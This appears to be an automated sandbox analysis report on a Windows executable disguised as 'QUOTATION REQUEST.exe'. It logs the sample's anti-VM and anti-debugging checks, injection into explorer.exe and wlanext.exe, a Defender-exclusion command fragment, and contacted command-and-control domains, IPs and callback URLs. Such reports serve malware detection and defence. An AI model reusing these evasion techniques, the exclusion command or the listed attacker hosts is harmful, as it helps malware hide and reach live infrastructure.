Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: Yara match	File source: 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION REQUEST.exe PID: 4660, type: MEMORY

Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 0000000000ED85E4 second address: 0000000000ED85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 0000000000ED897E second address: 0000000000ED8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe TID: 5296	Thread sleep time: -103583s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe TID: 3440	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4156	Thread sleep time: -70000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 4644	Thread sleep time: -52000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Thread delayed: delay time: 103583			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000005.00000000.249792104.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.249792104.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000005.00000000.252971907.0000000008907000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
Source: explorer.exe, 00000005.00000000.256483067.000000000F540000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.248911750.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000005.00000000.249430731.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 00000005.00000002.494643012.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000005.00000000.249792104.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000005.00000000.249792104.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000005.00000000.250059832.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000005.00000000.241452030.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.248911750.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.248911750.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000005.00000000.248911750.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\explorer.exe	Domain query: www.zryld.com
Source: C:\Windows\explorer.exe	Domain query: www.sloanksmith.com
Source: C:\Windows\explorer.exe	Domain query: www.pedroiniesta.net
Source: C:\Windows\explorer.exe	Domain query: www.shop-daily.info
Source: C:\Windows\explorer.exe	Domain query: www.letsratethis.com
Source: C:\Windows\explorer.exe	Domain query: www.inthebeginningshop.com
Source: C:\Windows\explorer.exe	Domain query: www.freecleanlimpieza.com
Source: C:\Windows\explorer.exe	Network Connect: 81.17.18.196 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.buffalobooze.com
Source: C:\Windows\explorer.exe	Domain query: www.madisonroselove.com
Source: C:\Windows\explorer.exe	Network Connect: 206.189.50.215 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.185.131.134 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.checkmytradesmanswork.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.colabchat.com
Source: C:\Windows\explorer.exe	Network Connect: 74.208.236.36 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.bestsellerselect.com
Source: C:\Windows\explorer.exe	Domain query: www.graet.design
Source: C:\Windows\explorer.exe	Network Connect: 46.30.211.38 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.cannabisllp.com

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Thread register set: target process: 3388			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Thread register set: target process: 3388			Jump to behavior

Source: explorer.exe, 00000005.00000002.482293325.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000005.00000000.231234912.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.486088950.0000000005CF0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.231234912.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.486088950.0000000005CF0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.231234912.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.486088950.0000000005CF0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.231234912.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.486088950.0000000005CF0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Queries volume information: C:\Users\user\Desktop\QUOTATION REQUEST.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
206.189.50.215	www.pedroiniesta.net	United States	14061	DIGITALOCEAN-ASNUS	true
192.185.131.134	freecleanlimpieza.com	United States	46606	UNIFIEDLAYER-AS-1US	true
34.102.136.180	letsratethis.com	United States	15169	GOOGLEUS	false
74.208.236.36	www.sloanksmith.com	United States	8560	ONEANDONE-ASBrauerstrasse48DE	true
46.30.211.38	www.graet.design	Denmark	51468	ONECOMDK	true
81.17.18.196	www.madisonroselove.com	Switzerland	51852	PLI-ASCH	true

Analysis Report QUOTATION REQUEST.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.letsratethis.com/n7ad/?bl=1rASbdTsLtsxQtx7SVeMPm6+5xONVyhrdB7mHEgQEcexIDozAv+yH2W2ARkxKFvsjoxU&uTgL=M6Al	false	Avira URL Cloud: safe	unknown
http://www.buffalobooze.com/n7ad/?bl=3Beq3lgI6UHTLP/Ph9xH30PGCdCNNtH+lu9vUppUW1NTSJAeHuoOIBtndyRiz3KwYif9&uTgL=M6Al	false	Avira URL Cloud: safe	unknown
www.pedroiniesta.net/n7ad/	true	Avira URL Cloud: safe	low
http://www.freecleanlimpieza.com/n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al	true	Avira URL Cloud: safe	unknown
http://www.sloanksmith.com/n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al	true	Avira URL Cloud: safe	unknown
http://www.checkmytradesmanswork.com/n7ad/?bl=Puv/nYz2ehHi82u6CLpica4tA5y7A2oAoTVRqDemxJRG3nb9hDTrPyPUdUehoaPW3KLQ&uTgL=M6Al	false	Avira URL Cloud: safe	unknown
http://www.graet.design/n7ad/?bl=2U/v4DZudtCtKNEpNcyI8CRPeodRf0IJyZopOKgcJ9ZvO/nIRtlTdWl2MHOFm/qEgPrh&uTgL=M6Al	true	Avira URL Cloud: safe	unknown
http://www.madisonroselove.com/n7ad/?bl=qa2xgx7e5WCBLzYnkogL20jLY4d2MJB4UugdV3pZH4CGnIGrQzpXbQB2X2xqi6qVP90G&uTgL=M6Al	true	Avira URL Cloud: safe	unknown
http://www.inthebeginningshop.com/n7ad/?bl=0nOrGG/dP8nX9ss6J8VJCOtskRWUcCjTb/L7IGsTqq8ZAGYUgptJ/YsQJEIM2Q4SHR3g&uTgL=M6Al	false	Avira URL Cloud: safe	unknown
http://www.pedroiniesta.net/n7ad/?bl=Qaff1jmf/WOjI2zVxXueSV7DqvqvSgTESbm8GMviNW1Wc3TSdSF2c0Ut34b2CH/EdSK4&uTgL=M6Al	true	Avira URL Cloud: safe	unknown
http://www.cannabisllp.com/n7ad/?bl=Nvf62Ubmifj7PfGA1A/q0uZrlG7ppTSV9dUQibuGvO9bggeeu0voIlbclGtGRlSBmBIt&uTgL=M6Al	false	Avira URL Cloud: safe	unknown

ID:	402973
Product:	CloudBasic
Start time:	16:49:20
Start date:	03.05.2021
Sample:	QUOTATION REQUEST.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	64af41000584694858d0fcc37b1bf69b
SHA1:	707c77c61fafdd736c1e02bfdbc8ce7ce24cc759
SHA256:	fea7b692b71803eb020f04ec1a5f8118f5845910d9677fdb4636d9a7d209d0fa
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.80%